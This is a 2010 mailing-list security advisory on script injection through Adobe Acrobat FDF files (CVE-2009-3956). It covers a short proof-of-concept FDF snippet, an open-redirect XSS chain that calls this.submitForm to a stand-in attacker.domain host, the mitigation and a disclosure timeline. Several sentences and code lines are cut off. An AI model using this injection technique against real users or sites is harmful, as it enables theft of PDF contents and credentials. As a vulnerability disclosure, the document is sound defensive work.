From: stratsec Research <research_at_nospam>
Date: Thu Jan 14 2010 - 04:19:22 GMT To: "email@example.com" <firstname.lastname@example.org>
Stratsec Security Advisory: SS-2010-001
Title: Adobe Acrobat Script Injection
Issue type: Script Injection
Affected vendor: Adobe
Affected product: Adobe Reader and Acrobat 9.2 and 8.1.7 and earlier versions.
Release date: 12/01/2010
Discovered by: Paul Theriault
Issue status: Patch available
A vulnerability exists within the Forms Data Format (FDF) built into
a Portable Document Format (PDF) file from any domain on the
internet. Successful exploitation of this issue results in the
potential disclosure of sensitive information or other cross-domain
attacks including cross-site scripting.
Acrobat Forms Data Format (FDF) is a mechanism designed to allow PDF
forms to be pre-populated with data. The standard process involves
loading an FDF file, which specifies data to be loaded and also the
location of the PDF that the data should be loaded into. However there
are several issues in this process which allow avenues for attack:
and "After" key which trigger script to load either before or after the
FDF is loaded.
The context in which this script is run is not the domain where the
FDF file is located, rather the domain of the target PDF file. By
default, Acrobat does not prevent the FDF files loading
scripts into PDF located on other domains.
Furthermore, the target file specification within FDF supports
by Acrobat Reader
Combining these behaviours allows an attacker to force a victim to load a PDF
from any domain, and subsequently execute script in the Acrobat scripting
engine, within the context of the target document.
This script would be able to perform any action that is possible within the
constraints of the Acrobat scripting engine - an example attack could be to
create a script which sends the contents of the PDF to a third party.
This issue can also be used to launch a cross-site scripting attack against any
domain hosting a PDF file. Normally the victim of such an attack must accept a
warning message. However, if an open redirection vulnerability exists on the
domain which is being targeted, cross-site scripting can be achieved without
this warning message.
used by an attacker to obtain the contents of sensitive PDF files, or perform
other attacks against the target domain. A domain which has an open redirection
and also hosts PDF files, is also vulnerable to cross-site scripting. In
general cross-site scripting vulnerabilities allow the theft of credentials
associated with the domain on which the bug exists.
Adobe Reader and Acrobat 9.2 and 8.1.7 and earlier versions.
Proof of concept
The primary exploit scenario is an attacker hosting a malicious FDF file,
which initiates loading of a PDF document from the target domain, and then
injects script which will be executed as if it was loaded from within the
target PDF domain. A proof of concept FDF file is shown below which
executes script in a randomly chosen PDF document hosted on the
1 0 obj
/After (app.alert("Executing script inside Acrobat at "+URL);)
<</Root 1 0 R>>
The "/F" key specifies the target PDF into which the FDF data is to be loaded,
and the "After" key specifies a script be executed after the FDF is loaded.
Note that the "Before" key also can be used to inject script.
It is important to note that this script is executing inside the Acrobat
not have access to browser session cookies. However as the "/F" object also
browser on the target domain. However Acrobat Reader provides a significant
mitigation for this attack, warning the user that an attack may be taking place.
This error message can be suppressed however if the domain hosting the PDF
file has an open redirection vulnerability. This attack requires two malicious
FDF files as follows:
Attacker convinces victim to navigate to malicious FDF file located at
attacker controlled domain (e.g. http://attacker.domain/xss.fdf). This file
has a target file of a PDF located on the target domain. This FDF file injects
a script that calls this.submitForm("http://attacker.domain/alert.php#FDF") to
load a second FDF file. Note at this point the reader shows a warning as the
However if the target domain has an open redirection vulnerability, the
attacker can use it to prevent the security warning message from being displayed
by injecting a script that calls something like:
This issue can be fixed by simply enabling "Enhanced Security" mode within
Acrobat. The vendor's response to this issue has been to enable by default in
the Acrobat update released January 12, 2010.
16/09/2009 - Vendor notified.
18/09/2009 - Vendor acknowledges receipt of advisory.
07/10/2009 - Vendor confirms issue presence, fix release date agreed as Jan 2010
12/10/2010 - This advisory published.
CVE item: CVE-2009-3956
Stratsec, specialises in providing information security consulting and testing
services for government and commercial clients. Established in 2004, we are
now one of the leading independent information security companies in the
Australasian and SE-Asian region.